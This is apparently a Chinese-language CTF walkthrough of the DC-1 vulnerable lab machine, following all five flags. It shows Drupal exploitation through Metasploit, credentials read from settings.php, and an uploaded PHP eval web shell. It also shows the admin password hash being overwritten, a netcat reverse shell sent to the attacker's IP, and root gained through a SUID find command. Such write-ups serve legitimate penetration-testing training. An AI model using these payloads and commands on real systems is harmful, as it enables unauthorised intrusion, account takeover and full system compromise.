外围信息收集
靶机描述
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
其中有五个flag
靶机界面
网卡信息
网卡模式 |
NAT模式Vmware8 |
网卡MAC地址 |
00:0C:29:CA:5D:2A |
主动信息收集
主机扫描
sudo arp-scan -I eth0 192.168.16.0/24
端口扫描
sudo nmap -A -sT -p- -sC -T4 192.168.16.138
发现两个端口开放
22 和80
网页信息
发现是基于Drupal框架写的
打开http://192.168.16.138/robots.txt
发现有个文件
打开发现Drupal版本可能是7
渗透过程
查找漏洞
kali打开msfconsole
输入 查找相关漏洞
search Drupal
我们选用第二个 use 1
设置目标IP set rhosts 192.168.16.138
开始攻击 run
成功建立连接
寻找flag
ls查看当前目录发现有flag1
flag1
查看flag1
cat flag1
发现下一个flag线索指向一个配置文件
通过百度搜索 Drupal的配置文件位于Drupal安装目录下的/sites/default/文件夹中
我们cd到目录下
cd sites/default
ls查看
flag2
有一个settings.php文件
cat settings.php
发现flag2 和数据库的账号密码
username:dbuser
password:R0ck3t
下一个flag可能和数据库有关
在本地kali桌面新建一个php文件,写入一句话木马
<?php @eval($_REQUEST[777])?>
上传到目标机上
upload /home/kali/Desktop/yjh.php
在浏览器上访问http://192.168.16.138/yjh.php
然后打开中国蚁剑(webshell管理工具)确保和目标机在同一网络下
鼠标右击空白处选择添加连接
输入url: http://192.168.16.138/yjh.php
密码: 777
鼠标右击选择数据操作
在drupaldb数据库下打开users表,发现admin账户
密码经过hash加密
进入shell中执行 把123456加密
./scripts/password-hash.sh 123456
$S$DM5BbYAf4O15952GGyjt88i0FA3/KCA3wH3/YLgTcxzz9uXl6Nj4
在蚁剑中输入 把原密码覆盖掉 密码是123456
update users set pass="$S$DM5BbYAf4O15952GGyjt88i0FA3/KCA3wH3/YLgTcxzz9uXl6Nj4
" where uid=1
在web端登录
flag3
反弹shell
在kali中输入
nc -lnvp 1234
打开监听端口
在目标机输入 (中国蚁剑右键打开虚拟终端)这里的ip是kali的ip
nc -e /bin/bash 192.168.16.128 1234
然后查看kali已经收到了shell反弹
输入
python -c 'import pty;pty.spawn("/bin/bash")'
打开伪终端
在本地查找具有siud权限的命令
find / -perm -4000 2>/dev/null
新建一个文件夹
mkdir /tmp/hello
输入
find /tmp/hello -exec "/bin/sh" \;
可见我们现在可以以root权限执行命令
cd到
cd /home/flag4
ls
cat flag4.txt
flag4
flag5
cd到
cd /root
ls
cat thefinalflag.txt
完毕!!